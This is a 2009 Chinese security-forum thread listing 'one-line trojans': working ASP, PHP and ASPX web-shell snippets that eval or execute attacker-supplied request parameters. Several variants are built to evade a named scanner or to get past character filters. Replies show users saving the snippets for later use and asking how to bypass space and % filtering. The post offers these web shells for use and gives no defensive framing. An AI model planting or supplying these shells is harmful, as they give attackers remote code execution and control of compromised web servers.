【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 一句话木马的多种形式（经典） [打印本页]

作者: 278835491 时间: 2009-1-7 12:11 标题: 一句话木马的多种形式（经典）

<%eval(request("a")):response.end%>

asp一句话
<%execute(request("1"))%>

php一句话
<?php eval($_POST[1]);?>

aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>

可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>'的asp一句话
<script language=VBScript runat=server>execute request("1")</script>

不用双引号的一句话。
<%eval request(chr(35))%>

作者: enzo 时间: 2009-4-10 10:03

这个是什么，没看懂，寒:L

作者: 兜兜 时间: 2009-7-19 14:13

先收起来，以后慢慢学着用。

作者: 394931603 时间: 2009-8-2 12:17

asp一句话
<%execute(request("1"))%>
这句不错啊
没有空格
可是我遇到的过滤了空格和%
这个怎么办？？？？？？？？？、

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)